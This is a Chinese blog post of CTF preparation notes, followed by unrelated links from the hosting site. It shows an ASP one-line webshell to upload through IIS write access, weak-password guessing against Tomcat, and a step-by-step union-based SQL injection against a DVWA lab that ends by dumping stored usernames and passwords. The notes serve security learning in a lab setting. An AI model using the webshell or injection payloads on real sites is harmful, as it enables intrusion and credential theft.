一、IIS write漏洞利用

先用工具扫描,再上传小马,使用菜刀连接即可。

思考点:

如何获知是一台IIS站点?

本例中上传的一句话木马是什么意思?

<%eval request("MH")%>

  

https://www.cnblogs.com/tdcqma/p/6125789.html

二、Tomcat服务器漏洞利用

先用nmap扫描端口开放信息。

然后利用metasploit或者Apache tomcat.exe工具里面的扫描办法来扫描弱口令。

需要注意的是,对于管理员账号的猜测,可以猜测admin、root、administrator等。

三、SQL 手工注入(以dvwa为例)(参考https://m.jb51.net/show/93442

1、判断字段总数:

admin,password登录dvwa后,将安全级别调至低。进入sql injection界面。

http://192.168.8.133/dvwa/vulnerabilities/sqli/

输入1’ 报错。确认有注入漏洞。

输入1' order by 2#正常返回结果。输入1' order by 3# 报错。表明数据库只有两列。order by 后面跟的应该是第几列的列数。这样看来数据库表只有两列。结尾的#号用于截断sql语句,以免报错。也可以换做-- -

2、判断显示位

1' union select 1,2# 可以看到1,2分别显示在first name和sur name处。

3、显当前示数据库和版本信息。

1' union select database(),version()#

4、显示所有数据库的名称

1' union select SCHEMA_name,1 from information_schema.schemata#

5、显示当前数据库表名

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

可以看到当前数据库表名:guestbook,users

6、查询列名:

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

7、查询数据值

1' union select group_concat(user,password),3 from users#

其中user和password是上一步得出的结果。

也可以写作

1' union select user,password from users#

四、PHP

1、strcmp漏洞

https://blog.csdn.net/cherrie007/article/details/77473817

九、在线工具收集

1、http post工具:

http://www.atool.org/httptest.php

https://getman.cn/

2、解码加密工具:

https://www.bejson.com/

3、PHP及其他语言在线调试工具:

https://c.runoob.com/compile/1

十、CTF大赛本身学习

1、鹏越CTF学霸专区

2、https://ctftime.org/ctfs

3、强网杯

4、XCTF(南京赛宁)

[攻防实战]CTF大赛准备(手动注入sql)的更多相关文章

  1. 【攻防实战】SQL注入演练!

    这篇文章目的是让初学者利用SQL注入技术来解决他们面临的问题, 成功的使用它们,并在这种攻击中保护自己. 1.0 介绍 当一台机器只打开了80端口, 你最依赖的漏洞扫描器也不能返回任何有用的内容, 并 ...

  2. dvwa——sql手动注入和sqlmap自动注入

    手动注入 low: 源码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; ...

  3. 20169214 2016-2017-2 《网络攻防实践》第十一周实验 SQL注入

    20169214 2016-2017-2 <网络攻防实践>SQL注入实验 SQL注入技术是利用web应用程序和数据库服务器之间的接口来篡改网站内容的攻击技术.通过把SQL命令插入到Web表 ...

  4. WAF攻防实战

    摘要 本文主要分为四个部分,一.首先对WAF做了简单的介绍,让读者对WAF这类产品有一个大概的了解:二.这部分通过一个实例演示了如何利用WAF为其后端的Web应用提供安全防护功能:三.安全是相对的,世 ...

  5. CTF大赛模拟-CFS三层内网漫游

    CTF大赛模拟-CFS三层内网漫游 环境: 三台虚拟机,三个网络. target 1:192.168.161.178 ,192.168.52.132 (linux) target 2:192.168. ...

  6. PHP手动注入实验

    课程编写 类别 内容 实验课题名称 PHP手动注入实验 实验目的与要求 1.通过手动注入PHP页面,获取password字段名. 2.了解PHP手动注入的基本原理. 3.了解PHP手动注入的过程和基本 ...

  7. 20145335郝昊《网络攻防》Bof逆向基础——ShellCode注入与执行

    20145335郝昊<网络攻防>Bof逆向基础--ShellCode注入与执行 实验原理 关于ShellCode:ShellCode是一段代码,作为数据发送给受攻击服务器,是溢出程序和蠕虫 ...

  8. SQL注入(SQL Injection)案例和防御方案

    sql注入(SQL Injection):就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. SQL注入攻击的主要危害包括:非法读取.篡 ...

  9. 【半小时大话.net依赖注入】(一)理论基础+实战控制台程序实现AutoFac注入

    系列目录 第一章|理论基础+实战控制台程序实现AutoFac注入 第二章|AutoFac的常见使用套路 第三章|实战Asp.Net Framework Web程序实现AutoFac注入 第四章|实战A ...

随机推荐

  1. [uiautomator篇] 获取当前页面的方法

    Uiautomator 在2.0之前的版本里就提供了getCurrentActivity()的方法,但返回内容不正确:2.0 版本今天尝试了下,还是返回有问题的: 有点没描述清楚啊,是在uiautom ...

  2. 第42届亚洲区域赛青岛站(2017icpc青岛)经验总结以及一些感想

    上一次写这种东西还是天梯赛,当时打完心里也是挺激动的,然后我们队也没有去参加省赛,但是过了一段时间我还是从那里面恢复了出来.因为我当时确实还是很菜的,当时连个暴力都不会,看着自己仅过的那些百度的题目确 ...

  3. 性能测试之五--webservices接口测试

    下面我们进行webservices接口的讲解,包括脚本生成,参数化和关联. 以天气预报的接口为例,接口地址为: http://ws.webxml.com.cn/WebServices/WeatherW ...

  4. django-Ajax发送POST请求-csrf跨站请求的三种方式

    第一种 <script> $(".eq").on("click",function () { $.ajax({ url:"/eq/&quo ...

  5. mongo 操作符

    1 $unset The $unset operator deletes a particular field. https://docs.mongodb.com/manual/reference/o ...

  6. Lucky and Good Months by Gregorian Calendar(poj 3393)

    大致题意: 科普文一篇,文章80%都是无用信息,因为都是常识,但是又不得不看,因为有20%是常人不知道的历史常识. 定义: Goog month : 该月第一个工作日为星期一的月份 Luckly mo ...

  7. Java远程调用BPS流程实现流程运行简单示例

    1.简介:略 2.背景:略 3.目的:自我学习笔记 4.实现过程 (1).画出流程图 如下: 路由活动分支下的条件语句为复杂表达式: ((account<200&&divisio ...

  8. Codeforces Round #284 (Div. 2) D. Name That Tune [概率dp]

    D. Name That Tune time limit per test 1 second memory limit per test 256 megabytes input standard in ...

  9. android的对话框

    android中的对话框形式有四种,分别是一般对话框形式,列表对话框形式,单选按钮对话框,多选按钮对话框,下面我一一对他们进行详解. <一>一般对话框 一般对话框形式如下图: 具体实现代码 ...

  10. 搭建Redis环境以及所遇问题(CentOS7+Redis 3.2.8)

    一.安装步骤 1. 首先需要安装gcc,把下载好的redis-3.2.8-rc2.tar.gz 放到/usr/local文件夹下 2. 进行解压 tar -zxvf redis-3.2.8-rc2.t ...